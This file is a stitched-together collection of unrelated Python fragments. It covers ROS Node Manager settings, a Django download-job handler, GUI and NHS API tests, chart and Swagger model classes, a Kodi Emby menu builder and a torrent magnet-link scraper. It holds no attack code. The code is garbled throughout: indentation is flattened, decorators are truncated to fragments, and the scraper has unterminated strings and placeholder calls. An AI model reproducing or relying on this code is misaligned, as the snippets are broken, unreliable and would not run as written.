settings.beginGroup('default_user_hosts')
self._default_user_hosts = dict()
for k in settings.childKeys():
self._default_user_hosts[k] = settings.value(k, self.default_user)
settings.endGroup()
self._current_dialog_path = self.CURRENT_DIALOG_PATH
self._log_viewer = self.LOG_VIEWER
self._start_remote_script = self.STARTER_SCRIPT
self.SEARCH_IN_EXT = list((set(self.SEARCH_IN_EXT) | set(self.str2list(self.launch_view_file_ext))))
self._rosconsole_cfg_file = 'rosconsole.config'
self.logging = LoggingConfig()
self.logging.loglevel = settings.value('logging/level', LoggingConfig.LOGLEVEL)
self.logging.loglevel_roscpp = settings.value('logging/level_roscpp', LoggingConfig.LOGLEVEL_ROSCPP)
self.logging.loglevel_superdebug = settings.value('logging/level_superdebug', LoggingConfig.LOGLEVEL_SUPERDEBUG)
self.logging.console_format = settings.value('logging/rosconsole_format', LoggingConfig.CONSOLE_FORMAT)
nmd_settings.GRPC_TIMEOUT = self.timeout_grpc
settings.beginGroup('host_colors')
self._host_colors = dict()
for k in settings.childKeys():
self._host_colors[k] = settings.value(k, None)
settings.endGroup()
self.init_hosts_color_list()
self._launch_history = None
self._icons_dir = os.path.join(os.path.dirname(__file__), 'icons')
def masteruri(self):
return self._masteruri
def _load_settings(self, settings):
result = {'reset': {':value': False, ':var': 'reset', ':hint': 'if this flag is set to True the configuration will be reseted.'}, 'reset_cache': {':value': False, ':var': 'reset_cache', ':hint': 'if this flag is set to True cached values will be removed.'}, 'Default user:': {':value': settings.value('default_user', 'robot'), ':var': 'default_user', ':default': 'robot', ':hint': 'The user used for ssh connection to remote hosts if no one is set for specific master. <span style="font-weight:600;">Restart required!</span>', ':need_restart': True}, 'Launch history length:': {':value': int(settings.value('launch_history_length', 5)), ':var': 'launch_history_length', ':default': 5, ':min': 0, ':max': 25, ':hint': 'The count of recent loaded launch files displayed in the root of the <span style="font-weight:600;">launch files</span> view.'}, 'Param history length:': {':value': int(settings.value('param_history_length', 12)), ':var': 'param_history_length', ':default': 12, ':min': 0, ':max': 25, ':hint': 'The count of parameters stored which are entered in a parameter dialog (Launch file arguments, parameter server, publishing to a topic, service call)'}, 'Settings path:': {':value': settings.value('cfg_path', self.CFG_PATH), ':var': 'cfg_path', ':path': 'dir', ':default': self.CFG_PATH, ':hint': '', ':ro': True}, 'Robot icon path:': {':value': os.path.join(self.PACKAGE_DIR, 'images'), ':var': 'robots_path', ':path': 'dir', ':default': os.path.join(self.PACKAGE_DIR, 'images'), ':hint': 'The path to the folder with robot images(<span style=" font-weight:600;">.png</span>). The images with robot name will be displayed in the info bar.'}, 'Show files extensions:': {':value': settings.value('launch_view_file_ext', ', '.join(self.LAUNCH_VIEW_EXT)), ':var': 'launch_view_file_ext', ':default': ', '.join(self.LAUNCH_VIEW_EXT), ':return_type': 'list', ':hint': 'Files that are displayed next to Launch files in the <span style="font-weight:600;">launch files</span> view.'}, 'Store window layout:': {':value': self.str2bool(settings.value('store_geometry', True)), ':var': 'store_geometry', ':default': True, ':hint': ''}, 'Movable dock widgets:': {':value': self.str2bool(settings.value('movable_dock_widgets', True)), ':var': 'movable_dock_widgets', ':default': True, ':hint': 'On false you can\'t reorganize docking widgets. <span style="font-weight:600;">Restart required!</span>', ':need_restart': True}, 'Max time difference:': {':value': float(settings.value('max_timediff', 0.5)), ':var': 'max_timediff', ':default': 0.5, ':step': 0.1, ':hint': 'Shows a warning if the time difference to remote host is greater than this value.'}, 'Autoupdate:': {':value': self.str2bool(settings.value('autoupdate', True)), ':var': 'autoupdate', ':default': True, ':hint': 'By default node manager updates the current state on changes. You can deactivate this behavior to reduce the network load. If autoupdate is deactivated you must refresh the state manually.'}, 'Start sync with discovery:': {':value': self.str2bool(settings.value('start_sync_with_discovery', False)), ':var': 'start_sync_with_discovery', ':default': False, ':hint': "Sets 'start sync' in 'Start' master discoverydialog to True, if this option is set to true."}, 'Start daemon with discovery:': {':value': self.str2bool(settings.value('start_daemon_with_discovery', False)), ':var': 'start_daemon_with_discovery', ':default': False, ':hint': "Sets 'start daemons' in 'Start' master discoverydialog to True, if this option is set to true."}, 'Confirm exit when closing:': {':value': self.str2bool(settings.value('confirm_exit_when_closing', True)), ':var': 'confirm_exit_when_closing', ':default': True, ':hint': 'Shows on closing of node_manager a dialog to stop all ROS nodes if this option is set to true.'}, 'Highlight xml blocks:': {':value': self.str2bool(settings.value('highlight_xml_blocks', True)), ':var': 'highlight_xml_blocks', ':default': True, ':hint': 'Highlights the current selected XML block, while editing ROS launch file.'}, 'Colorize hosts:': {':value': self.str2bool(settings.value('colorize_hosts', True)), ':var': 'colorize_hosts', ':default': True, ':hint': ('Determine automatic a default color for each host if True. Manually setting color will be preferred. You can select the color by double-click on hostname in description panel. To remove a setting color delete it manually from %s' % self.CFG_PATH)}, 'Check for nodelets at start:': {':value': self.str2bool(settings.value('check_for_nodelets_at_start', True)), ':var': 'check_for_nodelets_at_start', ':default': True, ':hint': 'Test the starting nodes for nodelet manager and all nodelets. If one of the nodes is not in the list a dialog is displayed with proposal to start other nodes, too.'}, 'Show noscreen error:': {':value': self.str2bool(settings.value('show_noscreen_error', True)), ':var': 'show_noscreen_error', ':default': True, ':hint': 'Shows an error if requested screen for a node is not available.'}, 'Autoreload changed launch files:': {':value': self.str2bool(settings.value('autoreload_launch', False)), ':var': 'autoreload_launch', ':default': False, ':hint': 'On change asks for reload launch file. On True reload without asking.'}, 'Show domain suffix:': {':value': self.str2bool(settings.value('show_domain_suffix', False)), ':var': 'show_domain_suffix', ':default': False, ':hint': 'Shows the domain suffix of the host in the host description panel and node tree view.'}, 'Transpose pub/sub description:': {':value': self.str2bool(settings.value('transpose_pub_sub_descr', True)), ':var': 'transpose_pub_sub_descr', ':default': True, ':hint': 'Transpose publisher/subscriber in description dock.'}, 'Timeout close dialog:': {':value': float(settings.value('timeout_close_dialog', 30.0)), ':var': 'timeout_close_dialog', ':default': 30.0, ':step': 1.0, ':hint': 'Timeout in seconds to close dialog while closing Node Manager. 0 disables autoclose functionality.'}, 'Group nodes by namespace:': {':value': self.str2bool(settings.value('group_nodes_by_namespace', True)), ':var': 'group_nodes_by_namespace', ':default': True, ':hint': 'Split namespace of the node by / and create groups for each name part. <span style="font-weight:600;">Restart required!</span>', ':need_restart': True}, 'Timeout for GRPC requests:': {':value': float(settings.value('timeout_grpc', nmd_settings.GRPC_TIMEOUT)), ':var': 'timeout_grpc', ':default': nmd_settings.GRPC_TIMEOUT, ':step': 1.0, ':hint': 'Timeout in seconds for GRPC requests to daemon.'}, 'Sysmon default interval:': {':value': int(settings.value('sysmon_default_interval', 10)), ':var': 'sysmon_default_interval', ':default': 10, ':step': 1, ':hint': 'Interval in seconds to get system monitor diagnostics from each remote host. <span style="font-weight:600;">Restart required!</span>', ':need_restart': True}, 'Use /diagnostigs_agg:': {':value': self.str2bool(settings.value('use_diagnostics_agg', False)), ':var': 'use_diagnostics_agg', ':default': False, ':hint': 'subscribes to \'/diagnostics_agg\' topic instead of \'/diagnostics\'. <span style="font-weight:600;">Restart required!</span>', ':need_restart': True}, 'Use internal log widget:': {':value': self.str2bool(settings.value('use_internal_log_widget', True)), ':var': 'use_internal_log_widget', ':default': False, ':hint': 'Opens the log file in internal dock instead of new terminal. If deactivated still accessible with Ctrl modifier.', ':need_restart': False}}
return result
def yaml(self):
return self._data
def set_yaml(self, data):
reset = False
reset_cache = False
need_restart = False
for value in data.values():
setattr(self, value[':var'], value[':value'])
if (':need_restart' in value):
if value[':need_restart']:
need_restart = True
if (value[':var'] == 'reset'):
reset = value[':value']
if (value[':var'] == 'reset_cache'):
reset_cache = value[':value']
if need_restart:
MessageBox.information(None, 'restart Node Manager', 'Some of modified parameter requires a restart of Node Manager!')
if reset:
try:
os.remove(os.path.join(self.CFG_PATH, self.CFG_FILE))
os.remove(os.path.join(self.CFG_PATH, self.CFG_GUI_FILE))
except Exception:
pass
self.reload()
if reset_cache:
try:
os.remove(os.path.join(self.CFG_PATH, self.LAUNCH_HISTORY_FILE))
os.remove(os.path.join(self.CFG_PATH, self.PARAM_HISTORY_FILE))
except Exception:
pass
def __getattr__(self, name):
for value in self._data.values():
if (value[':var'] == name):
if (':return_type' in value):
if (value[':return_type'] == 'list'):
return self.str2list(value[':value'])
return value[':value']
raise AttributeError(("'Settings' has no attribute '%s'" % name))
def __setattr__(self, name, value):
if (name == '_data'):
object.__setattr__(self, name, value)
for val in self._data.values():
if (val[':var'] == name):
setval = value
val[':value'] = setval
if (':path' in val):
if (val[':path'] == 'dir'):
setval = os.path.abspath(setval).rstrip(os.path.sep)
val[':value'] = setval
if (name == 'cfg_path'):
if (not os.path.isdir(setval)):
os.makedirs(setval)
settings = self.qsettings(self.CFG_FILE)
settings.setValue(name, setval)
return
object.__setattr__(self, name, value)
def icon_path(self, name):
return os.path.join(self._icons_dir, name)
def icon(self, name):
return QIcon(self.icon_path(name))
def image(self, name):
return QImage(self.icon_path(name))
def pixmap(self, name):
return QPixmap(self.icon_path(name))
def host_user(self, host):
if (host in self._default_user_hosts):
return self._default_user_hosts[host]
return self.default_user
def set_host_user(self, host, user):
if (host and user):
self._default_user_hosts[host] = user
settings = self.qsettings(self.CFG_FILE)
settings.setValue(('default_user_hosts/%s' % host), user)
def current_dialog_path(self):
return self._current_dialog_path
_dialog_path.setter
def current_dialog_path(self, path):
self._current_dialog_path = path
def robot_image_file(self, robot_name):
return os.path.join(self.robots_path, ('%s.png' % robot_name))
def log_viewer(self):
return self._log_viewer
_viewer.setter
def log_viewer(self, viewer):
self._log_viewer = viewer
def start_remote_script(self):
return self._start_remote_script
_remote_script.setter
def start_remote_script(self, script):
self._start_remote_script = script
def rosconsole_cfg_file(self, package):
result = os.path.join(self.LOG_PATH, ('%s.%s' % (package, self._rosconsole_cfg_file)))
with open(result, 'w') as cfg_file:
cfg_file.write(('log4j.logger.ros=%s\n' % self.logging.loglevel))
cfg_file.write(('log4j.logger.ros.roscpp=%s\n' % self.logging.loglevel_roscpp))
cfg_file.write(('log4j.logger.ros.roscpp.superdebug=%s\n' % self.logging.loglevel_superdebug))
return result
def store_logging(self):
settings = self.qsettings(self.CFG_FILE)
settings.setValue('logging/level', self.logging.loglevel)
settings.setValue('logging/level_roscpp', self.logging.loglevel_roscpp)
settings.setValue('logging/level_superdebug', self.logging.loglevel_superdebug)
settings.setValue('logging/rosconsole_format', self.logging.console_format)
def host_color(self, host, default_color):
if self.colorize_hosts:
if (host in self._host_colors):
result = self._host_colors[host]
if isstring(result):
return int(result)
return result
else:
hash_str = hashlib.md5(host.encode('utf-8')).hexdigest()
hash_int = int(hash_str, 16)
index = (abs(hash_int) % len(self.DEAFULT_HOST_COLORS))
return self.DEAFULT_HOST_COLORS[index]
return default_color
def set_host_color(self, host, color):
if (host and color):
self._host_colors[host] = color
settings = self.qsettings(self.CFG_FILE)
settings.setValue(('host_colors/%s' % host), color)
def launch_history(self):
if (self._launch_history is not None):
return self._launch_history
result = list()
history_file = self.qsettings(self.LAUNCH_HISTORY_FILE)
size = history_file.beginReadArray('launch_history')
for i in range(size):
history_file.setArrayIndex(i)
if (i >= self.launch_history_length):
break
launch_file = history_file.value('file')
result.append(launch_file)
history_file.endArray()
self._launch_history = result
return self._launch_history
def launch_history_add(self, path, replace=None):
to_remove = replace
if (replace is None):
to_remove = path
if (self._launch_history is None):
self.launch_history
try:
self._launch_history.remove(to_remove)
except Exception:
pass
self._launch_history.append(path)
while (len(self._launch_history) > self.launch_history_length):
self._launch_history.pop(0)
self._launch_history_save(self._launch_history)
def launch_history_remove(self, path):
try:
self._launch_history.remove(path)
self._launch_history_save(self._launch_history)
except Exception:
pass
def _launch_history_save(self, paths):
history_file = self.qsettings(self.LAUNCH_HISTORY_FILE)
history_file.beginWriteArray('launch_history')
for (i, launch_file) in enumerate(paths):
history_file.setArrayIndex(i)
history_file.setValue('file', launch_file)
history_file.endArray()
self._launch_history = list(paths)
def str2bool(self, v):
if isinstance(v, bool):
return v
return (v.lower() in ('yes', 'true', 't', '1'))
def str2list(self, lstr):
if isinstance(lstr, list):
return lstr
try:
lstr = lstr.strip('[]')
lstr = lstr.replace('u"', '')
lstr = lstr.replace('"', '')
lstr = lstr.replace("'", '')
lstr = lstr.replace(',', ' ')
return [utf8(i).strip() for i in lstr.split(' ') if i]
except Exception:
return []
def terminal_cmd(self, cmd, title, noclose=False):
terminal_emulator = ''
terminal_title = self._terminal_title
noclose_str = self._noclose_str
terminal_command_arg = self._terminal_command_arg
for t in ['/usr/bin/x-terminal-emulator', '/usr/bin/xterm', '/opt/x11/bin/xterm']:
if (os.path.isfile(t) and os.access(t, os.X_OK)):
print(os.path.basename(os.path.realpath(t)))
if (os.path.basename(os.path.realpath(t)) in ['terminator', 'gnome-terminal', 'xfce4-terminal']):
terminal_command_arg = 'x'
else:
terminal_command_arg = 'e'
if (os.path.basename(os.path.realpath(t)) in ['terminator', 'gnome-terminal', 'gnome-terminal.wrapper']):
noclose_str = '--profile hold'
if noclose:
rospy.loginfo("If your terminal close after the execution, you can change this behavior in profiles. You can also create a profile with name 'hold'. This profile will be then load by node_manager.")
elif (os.path.basename(os.path.realpath(t)) in ['xfce4-terminal', 'xterm', 'lxterm', 'uxterm']):
noclose_str = ''
terminal_title = '-T'
terminal_emulator = t
break
if (terminal_emulator == ''):
raise Exception("No Terminal found! Please install one of ['/usr/bin/x-terminal-emulator', '/usr/bin/xterm', '/opt/x11/bin/xterm']")
noclose_str = (noclose_str if noclose else '')
title_opt = ''
if title:
title_opt = ('%s "%s"' % (terminal_title, title))
return ('%s %s %s -%s %s' % (terminal_emulator, title_opt, noclose_str, terminal_command_arg, ' '.join(cmd)))
def qsettings(self, settings_file):
path = settings_file
if (not settings_file.startswith(os.path.sep)):
path = os.path.join(self.CFG_PATH, settings_file)
return QSettings(path, QSettings.IniFormat)
def init_hosts_color_list(self):
self.DEAFULT_HOST_COLORS = [QColor(255, 255, 235).rgb(), QColor(87, 93, 94).rgb(), QColor(205, 186, 136).rgb(), QColor(249, 168, 0).rgb(), QColor(232, 140, 0).rgb(), QColor(175, 128, 79).rgb(), QColor(221, 175, 39).rgb(), QColor(227, 217, 198).rgb(), QColor(186, 72, 27).rgb(), QColor(246, 120, 40).rgb(), QColor(255, 77, 6).rgb(), QColor(89, 25, 31).rgb(), QColor(216, 160, 166).rgb(), QColor(129, 97, 131).rgb(), QColor(196, 97, 140).rgb(), QColor(118, 104, 154).rgb(), QColor(188, 64, 119).rgb(), QColor(0, 56, 123).rgb(), QColor(15, 76, 100).rgb(), QColor(0, 137, 182).rgb(), QColor(99, 125, 150).rgb(), QColor(5, 139, 140).rgb(), QColor(34, 45, 90).rgb(), QColor(60, 116, 96).rgb(), QColor(54, 103, 53).rgb(), QColor(80, 83, 60).rgb(), QColor(17, 66, 50).rgb(), QColor(108, 124, 89).rgb(), QColor(97, 153, 59).rgb(), QColor(185, 206, 172).rgb(), QColor(0, 131, 81).rgb(), QColor(126, 186, 181).rgb(), QColor(0, 181, 26).rgb(), QColor(122, 136, 142).rgb(), QColor(108, 110, 107).rgb(), QColor(118, 106, 94).rgb(), QColor(56, 62, 66).rgb(), QColor(128, 128, 118).rgb(), QColor(127, 130, 116).rgb(), QColor(197, 199, 196).rgb(), QColor(137, 105, 62).rgb(), QColor(112, 69, 42).rgb(), QColor(141, 73, 49).rgb(), QColor(90, 56, 38).rgb(), QColor(233, 224, 210).rgb(), QColor(236, 236, 231).rgb(), QColor(43, 43, 44).rgb(), QColor(121, 123, 122).rgb()] |
class DownloadAdministrator():
def __init__(self):
self.download_job = None
def search_for_a_download(self, **kwargs):
queryset_filter = self.craft_queryset_filter(**kwargs)
self.get_download_job(queryset_filter)
def craft_queryset_filter(**kwargs):
if (len(kwargs) == 0):
raise Exception('An invalid value was provided to the argument')
return Q(**kwargs)
def get_download_job(self, queryset_filter):
self.download_job = query_database_for_record(queryset_filter)
def restart_download_operation(self):
self.update_download_job(error_message=None, file_size=0, job_status_id=(JOB_STATUS_DICT['queued'] if process_is_local() else JOB_STATUS_DICT['ready']), number_of_columns=0, number_of_rows=0, update_date=datetime.now(timezone.utc))
if process_is_local():
download_generation.generate_download(download_job=self.download_job)
else:
self.push_job_to_queue()
def update_download_job(self, **kwargs):
for (field, value) in kwargs.items():
setattr(self.download_job, field, value)
self.download_job.save()
def push_job_to_queue(self):
queue = get_sqs_queue(queue_name=settings.BULK_DOWNLOAD_SQS_QUEUE_NAME)
queue.send_message(MessageBody=str(self.download_job.download_job_id)) |
def test_that_the_manage_cases_tool_can_be_used_with_clean_storage(opened_main_window_clean, qtbot):
gui = opened_main_window_clean
def handle_dialog(dialog, cases_panel):
cases_panel.setCurrentIndex(0)
current_tab = cases_panel.currentWidget()
assert (current_tab.objectName() == 'create_new_case_tab')
create_widget = get_child(current_tab, AddRemoveWidget)
case_list = get_child(current_tab, CaseList)
assert (case_list._list.count() == 0)
def handle_add_dialog():
dialog = wait_for_child(current_tab, qtbot, ValidatedDialog)
dialog.param_name.setText('new_case')
qtbot.mouseClick(dialog.ok_button, Qt.LeftButton)
QTimer.singleShot(1000, handle_add_dialog)
qtbot.mouseClick(create_widget.addButton, Qt.LeftButton)
assert (case_list._list.count() == 1)
assert (case_list._list.item(0).data(Qt.UserRole).name == 'new_case')
cases_panel.setCurrentIndex(1)
current_tab = cases_panel.currentWidget()
assert (current_tab.objectName() == 'initialize_from_scratch_panel')
combo_box = get_child(current_tab, CaseSelector)
assert combo_box.currentText().startswith('new_case')
initialize_button = get_child(current_tab, QPushButton, name='initialize_from_scratch_button')
qtbot.mouseClick(initialize_button, Qt.LeftButton)
dialog.close()
with_manage_tool(gui, qtbot, handle_dialog) |
class OptionSeriesLollipopLowmarker(Options):
def enabled(self):
return self._config_get(None)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def enabledThreshold(self):
return self._config_get(2)
def enabledThreshold(self, num: float):
self._config(num, js_type=False)
def fillColor(self):
return self._config_get(None)
def fillColor(self, text: str):
self._config(text, js_type=False)
def height(self):
return self._config_get(None)
def height(self, num: float):
self._config(num, js_type=False)
def lineColor(self):
return self._config_get('#ffffff')
def lineColor(self, text: str):
self._config(text, js_type=False)
def lineWidth(self):
return self._config_get(0)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def radius(self):
return self._config_get(4)
def radius(self, num: float):
self._config(num, js_type=False)
def states(self) -> 'OptionSeriesLollipopLowmarkerStates':
return self._config_sub_data('states', OptionSeriesLollipopLowmarkerStates)
def symbol(self):
return self._config_get(None)
def symbol(self, text: str):
self._config(text, js_type=False)
def width(self):
return self._config_get(None)
def width(self, num: float):
self._config(num, js_type=False) |
class TelemetryMessageVehicleTransmissionGearboxGear(object):
swagger_types = {'recommended': 'str'}
attribute_map = {'recommended': 'recommended'}
def __init__(self, recommended=None):
self._recommended = None
self.discriminator = None
if (recommended is not None):
self.recommended = recommended
def recommended(self):
return self._recommended
def recommended(self, recommended):
allowed_values = ['None', 'Up', 'Down', 'UpDown']
if (recommended not in allowed_values):
raise ValueError('Invalid value for `recommended` ({0}), must be one of {1}'.format(recommended, allowed_values))
self._recommended = recommended
def to_dict(self):
result = {}
for (attr, _) in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map((lambda x: (x.to_dict() if hasattr(x, 'to_dict') else x)), value))
elif hasattr(value, 'to_dict'):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map((lambda item: ((item[0], item[1].to_dict()) if hasattr(item[1], 'to_dict') else item)), value.items()))
else:
result[attr] = value
if issubclass(TelemetryMessageVehicleTransmissionGearboxGear, dict):
for (key, value) in self.items():
result[key] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if (not isinstance(other, TelemetryMessageVehicleTransmissionGearboxGear)):
return False
return (self.__dict__ == other.__dict__)
def __ne__(self, other):
return (not (self == other)) |
class TestAPIOrgViews(TestCase):
fixtures = ['orgs', 'practices']
api_prefix = '/api/1.0'
def test_api_view_org_code(self):
url = ('%s/org_code?q=ainsdale&format=json' % self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 1)
self.assertEqual(content[0]['code'], 'N84014')
self.assertEqual(content[0]['name'], 'AINSDALE VILLAGE SURGERY')
url = ('%s/org_code?q=P87&format=json' % self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 1)
self.assertEqual(content[0]['code'], 'P87629')
self.assertEqual(content[0]['name'], '1/ST ANDREWS MEDICAL PRACTICE')
self.assertEqual(content[0]['type'], 'practice')
self.assertEqual(content[0]['setting'], 4)
self.assertEqual(content[0]['setting_name'], 'GP Practice')
url = ('%s/org_code?q=03&format=json' % self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 2)
self.assertEqual(content[0]['code'], '03Q')
self.assertEqual(content[0]['name'], 'NHS Vale of York')
def test_api_view_org_code_org_type_open_ccgs_only(self):
closed = PCT.objects.first()
closed.close_date = datetime.date(2001, 1, 1)
closed.save()
url = ('%s/org_code?q=03&format=json' % self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 1)
def test_api_view_org_code_org_type(self):
url = ('%s/org_code?q=a&org_type=practice&format=json' % self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 3)
self.assertEqual(content[0]['code'], 'P87629')
self.assertEqual(content[0]['name'], '1/ST ANDREWS MEDICAL PRACTICE')
url = ('%s/org_code?q=a&org_type=CCG&format=json' % self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 1)
self.assertEqual(content[0]['code'], '03Q')
self.assertEqual(content[0]['name'], 'NHS Vale of York')
def test_api_view_org_code_is_exact(self):
url = ('%s/org_code?q=N84014&exact=true&format=json' % self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 1)
self.assertEqual(content[0]['code'], 'N84014')
self.assertEqual(content[0]['name'], 'AINSDALE VILLAGE SURGERY')
url = ('%s/org_code?q=P87&exact=true&format=json' % self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 0)
def test_api_view_all_orgs(self):
url = ('%s/org_code?format=json' % self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 7)
self.assertEqual(content[0]['code'], '03Q')
self.assertEqual(content[0]['name'], 'NHS Vale of York')
self.assertEqual(content[0]['type'], 'CCG')
self.assertEqual(content[(- 1)]['code'], 'B82018')
self.assertEqual(content[(- 1)]['name'], 'ESCRICK SURGERY')
self.assertEqual(content[(- 1)]['type'], 'practice')
def test_stp_inexact_match(self):
url = ('%s/org_code?q=northampton&format=json&org_type=stp' % self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 1)
self.assertEqual(content[0]['code'], 'E55')
self.assertEqual(content[0]['name'], 'Northamptonshire')
def test_stp_exact_match(self):
url = '{}/org_code?q=E54&format=json&org_type=stp&exact=true'.format(self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 1)
self.assertEqual(content[0]['code'], 'E54')
self.assertEqual(content[0]['name'], 'Humber, Coast and Vale')
def test_regional_team_inexact_match(self):
url = '{}/org_code?q=north&format=json&org_type=regional_team'.format(self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 1)
self.assertEqual(content[0]['code'], 'Y54')
self.assertEqual(content[0]['name'], 'NORTH OF ENGLAND COMMISSIONING REGION')
def test_regional_team_exact_match(self):
url = '{}/org_code?q=Y55&format=json&org_type=regional_team&exact=true'.format(self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 1)
self.assertEqual(content[0]['code'], 'Y55')
self.assertEqual(content[0]['name'], 'MIDLANDS AND EAST OF ENGLAND COMMISSIONING REGION')
def test_pcn_inexact_match(self):
url = '{}/org_code?q=transformational&format=json&org_type=pcn'.format(self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 1)
self.assertEqual(content[0]['code'], 'PCN0001')
self.assertEqual(content[0]['name'], 'Transformational Sustainability')
def test_pcn_exact_match(self):
url = '{}/org_code?q=PCN0002&format=json&org_type=pcn&exact=true'.format(self.api_prefix)
response = self.client.get(url, follow=True)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(len(content), 1)
self.assertEqual(content[0]['code'], 'PCN0002')
self.assertEqual(content[0]['name'], 'Sustainable Transformation') |
def _check_memory_usage():
memory_usage = psutil.virtual_memory().percent
if (memory_usage > 95.0):
logging.critical(f'System memory is critically low: {memory_usage}%')
elif (memory_usage > 80.0):
logging.warning(f'System memory is running low: {memory_usage}%')
else:
logging.info(f'System memory usage: {memory_usage}%') |
def display_livetv_type(menu_params, view):
handle = int(sys.argv[1])
xbmcplugin.setContent(handle, 'files')
view_name = view.get('Name')
params = {}
params['UserId'] = '{userid}'
params['Recursive'] = False
params['ImageTypeLimit'] = 1
params['Fields'] = '{field_filters}'
path = get_emby_url('{server}/emby/LiveTv/Channels', params)
url = (((sys.argv[0] + '?url=') + urllib.parse.quote(path)) + '&mode=GET_CONTENT&media_type=livetv')
add_menu_directory_item((view_name + string_load(30360)), url)
params = {}
params['UserId'] = '{userid}'
params['IsAiring'] = True
params['ImageTypeLimit'] = 1
params['Fields'] = 'ChannelInfo,{field_filters}'
params['EnableTotalRecordCount'] = False
path = get_emby_url('{server}/emby/LiveTv/Programs/Recommended', params)
url = (((sys.argv[0] + '?url=') + urllib.parse.quote(path)) + '&mode=GET_CONTENT&media_type=livetv')
add_menu_directory_item((view_name + string_load(30361)), url)
params = {}
params['UserId'] = '{userid}'
params['Recursive'] = False
params['ImageTypeLimit'] = 1
params['Fields'] = '{field_filters}'
params['EnableTotalRecordCount'] = False
path = get_emby_url('{server}/emby/LiveTv/Recordings', params)
url = (((sys.argv[0] + '?url=') + urllib.parse.quote(path)) + '&mode=GET_CONTENT&media_type=livetv')
add_menu_directory_item((view_name + string_load(30362)), url)
xbmcplugin.endOfDirectory(handle) |
class ciligogo(object):
url = '
name = 'ciligogo'
support_sort = ['relevance', 'addtime', 'size', 'popular']
page_result_count = 10
supported_categories = {'all': ''}
def __init__(self):
pass
def getsearchurl(self):
try:
magneturls = plugin.get_storage('magneturls')
magneturls[self.name] = '
magneturls.sync()
return
jubturl = '
rsp = _
for match in re.finditer('\\x3Ctd\\x3E\\s*\\x3Ca\\s+href\\x3D[\\x22\\x27](?P<url>.*?)[\\x22\\x27]', rsp, (re.IGNORECASE | re.DOTALL)):
if url_is_alive(match.group('url')):
jubturl = match.group('url')
break
rsp = _ + '/cn/index.html'))
match = re.search('window\\x2Eopen\\x28(?:\\x26\\x2334\\x3B)?(?P<url>(?: rsp, (re.IGNORECASE | re.DOTALL))
if match:
magneturls[self.name] = [match.group('url').strip().rstrip('/')]
else:
magneturls[self.name] = '
magneturls.sync()
except:
xbmc.log(msg=format_exc(), level=xbmc.LOGERROR)
def search(self, what, cat='all', sorttype='relevance', page='1'):
result = {}
result['state'] = False
result['list'] = []
result['sorttype'] = sorttype
if (sorttype == 'addtime'):
sorttype = 'time'
elif (sorttype == 'size'):
sorttype = 'size'
elif (sorttype == 'relevance'):
sorttype = 'rel'
else:
sorttype = 'hits'
magneturls = plugin.get_storage('magneturls')
searchurl = magneturls[self.name]
searchurl = ('%s/so/%s_%s_%s.html' % (searchurl, parse.quote(what), str(sorttype), str(int(page))))
try:
pageresult = _
rmain = '\\x2Fbt\\x2F(?P<magnet>[a-z0-9]{40})\\x2Ehtml.*?[\\x22\\x27]\\x3E(?P<title>.*?)\\x3C\\x2Fa\\x3E.*?.*?\\x3Cb\\x3E(?P<createtime>.*?)\\x3C\\x2Fb\\x3E.*?.*?\\x3E(?P<filesize>.*?)\\x3C\\x2Fb\\x3E'
reobj = re.compile(rmain, (re.IGNORECASE | re.DOTALL))
for match in reobj.finditer(pageresult):
title = match.group('title').replace('<em>', '').replace('</em>', '').strip()
filesize = match.group('filesize').strip()
createtime = match.group('createtime').strip()
magnet = ('magnet:?xt=urn:btih:' + match.group('magnet'))
res_dict = dict()
res_dict['name'] = title
res_dict['size'] = filesize
res_dict['filecount'] = ''
res_dict['seeds'] = ''
res_dict['leech'] = ''
res_dict['link'] = magnet
res_dict['date'] = createtime
res_dict['desc_link'] = ''
res_dict['engine_url'] = self.url
result['list'].append(res_dict)
if (pageresult.find('»') >= 0):
result['nextpage'] = True
except Exception as ex:
xbmc.log(msg=format_exc(), level=xbmc.LOGERROR)
return result
result['state'] = True
return result |
def get_basic_config():
time_alignment_config = FilteringConfig()
time_alignment_config.smoothing_kernel_size_A = 25
time_alignment_config.clipping_percentile_A = 99.5
time_alignment_config.smoothing_kernel_size_B = 25
time_alignment_config.clipping_percentile_B = 99.0
hand_eye_config = HandEyeConfig()
hand_eye_config.use_baseline_approach = False
hand_eye_config.algorithm_name = ''
hand_eye_config.enable_exhaustive_search = False
hand_eye_config.min_num_inliers = 10
